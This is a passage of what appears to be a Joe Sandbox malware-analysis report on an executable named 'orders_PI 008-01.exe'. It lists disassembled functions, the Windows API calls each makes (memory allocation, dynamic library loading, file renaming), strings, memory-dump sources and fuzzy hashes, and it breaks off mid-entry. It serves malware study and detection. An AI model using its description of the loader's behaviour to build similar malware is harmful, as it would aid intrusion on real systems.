                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                        • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                        • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                        • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                        Function 00404390 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                        • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                        • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                        • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                        Function 0040345A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,?,?,?), ref: 00403468
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                        Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,?,?,004041A4), ref: 00404387
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                        • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                        • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                        • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                        Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                        • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                        • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                        • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                        Function 6FF42AF8 Relevance: 1.4, APIs: 1, Instructions: 143memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000), ref: 6FF42BB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: a59346ab49a4f15fa888c8accfbc241af7790ab786aff5c59b2ed716108b9335
                                        • Instruction ID: 0c9c51ff095f2eae9d903316ae20a78af270fe12cd9645dd238a8bd388f81a01
                                        • Opcode Fuzzy Hash: a59346ab49a4f15fa888c8accfbc241af7790ab786aff5c59b2ed716108b9335
                                        • Instruction Fuzzy Hash: 6B419F76410705DFDB20FFACD980B593F74EF56328F248975E904CA362C736A4998BA1
                                        Function 6FF4121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalAlloc.KERNELBASE(?,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: AllocGlobal
                                        • String ID:
                                        • API String ID: 3761449716-0
                                        • Opcode ID: 8ac853b157e3d29670509e7d4e3fc1534842e7f7c305d97ca4392d4f83452dbf
                                        • Instruction ID: f0f88bb333c776bfc90923b7f242aa05c9139358075ed49ec17bce39e1d44b19
                                        • Opcode Fuzzy Hash: 8ac853b157e3d29670509e7d4e3fc1534842e7f7c305d97ca4392d4f83452dbf
                                        • Instruction Fuzzy Hash: 90B01274A10400DFEE00BF6CCC06F343654F711311F084000FA00D0392C1244C388534

                                        Non-executed Functions

                                        Function 6FF41B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6FF4121B: GlobalAlloc.KERNELBASE(?,?,6FF4123B,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF41225
                                        • GlobalAlloc.KERNEL32(?,00001CA4), ref: 6FF41C8D
                                        • lstrcpyW.KERNEL32(00000008,?), ref: 6FF41CD5
                                        • lstrcpyW.KERNEL32(00000808,?), ref: 6FF41CDF
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41CF2
                                        • GlobalFree.KERNEL32(?), ref: 6FF41DD4
                                        • GlobalFree.KERNEL32(?), ref: 6FF41DD9
                                        • GlobalFree.KERNEL32(?), ref: 6FF41DDE
                                        • GlobalFree.KERNEL32(00000000), ref: 6FF41FC8
                                        • lstrcpyW.KERNEL32(?,?), ref: 6FF42182
                                        • GetModuleHandleW.KERNEL32(00000008), ref: 6FF42201
                                        • LoadLibraryW.KERNEL32(00000008), ref: 6FF42212
                                        • GetProcAddress.KERNEL32(?,?), ref: 6FF4226C
                                        • lstrlenW.KERNEL32(00000808), ref: 6FF42286
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1674253327.000000006FF41000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF40000, based on PE: true
                                        • Associated: 00000000.00000002.1674224580.000000006FF40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674274347.000000006FF44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000000.00000002.1674346645.000000006FF46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6ff40000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                        • String ID:
                                        • API String ID: 245916457-0
                                        • Opcode ID: 1ca32c0700a8fe796ff8d94884ca3f8388ea40a41fb94557a89bdfcf7bc90378
                                        • Instruction ID: 175d2874a101af50c9576d0a2b110d68688f2f2ca8ccdba379914442fa3ddb67
                                        • Opcode Fuzzy Hash: 1ca32c0700a8fe796ff8d94884ca3f8388ea40a41fb94557a89bdfcf7bc90378
                                        • Instruction Fuzzy Hash: 56229D72D14606DADB12CFB8C9806EEBFB0FF09315F10462ED165E7292E77466A1CB50
                                        Function 0040603A Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130memorystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061D5,00000000,00000000), ref: 00406075
                                        • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                          • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                          • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                        • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                        • wsprintfA.USER32 ref: 004060B9
                                        • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,?,007A5DE8,?), ref: 004060F4
                                        • GlobalAlloc.KERNEL32(?,0000000A), ref: 00406103
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040613B
                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                        • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                        • CloseHandle.KERNEL32(00000000), ref: 004061A9
                                          • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\orders_PI 008-01.exe,80000000,?,?,?,?,?), ref: 00405EE8
                                          • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405F0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %ls=%ls$[Rename]$Uz$]z
                                        • API String ID: 2171350718-2939442745
                                        • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                        • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                        • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                        • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                        Function 0040669D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00406700
                                        • CharNextW.USER32(?,?,?,00000000,?,?,?,?), ref: 0040670F
                                        • CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00406714
                                        • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\orders_PI 008-01.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,?,?,?), ref: 00406727
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040669E
                                        • *?|<>/":, xrefs: 004066EF
                                        • "C:\Users\user\Desktop\orders_PI 008-01.exe", xrefs: 0040669D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\orders_PI 008-01.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-1771627364
                                        • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                        • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                        • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                        Function 004043AB Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                        • GetSysColor.USER32(00000000), ref: 00404406
                                        • SetTextColor.GDI32(?,00000000), ref: 00404412
                                        • SetBkMode.GDI32(?,?), ref: 0040441E
                                        • GetSysColor.USER32(?), ref: 00404431
                                        • SetBkColor.GDI32(?,?), ref: 00404441
                                        • DeleteObject.GDI32(?), ref: 0040445B
                                        • CreateBrushIndirect.GDI32(?), ref: 00404465
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                        • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                        • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                        • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                        Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402F49
                                        • MulDiv.KERNEL32(000DCD99,00000064,000DD698), ref: 00402F74
                                        • wsprintfW.USER32 ref: 00402F84
                                        • SetWindowTextW.USER32(?,?), ref: 00402F94
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402F7E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1642579292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1642564161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642594706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642609057.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1642849894.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: e04d04eb7b63203ce5fd1c353c1d281d58231c4b0d3ff082bc1608e2171a15b6
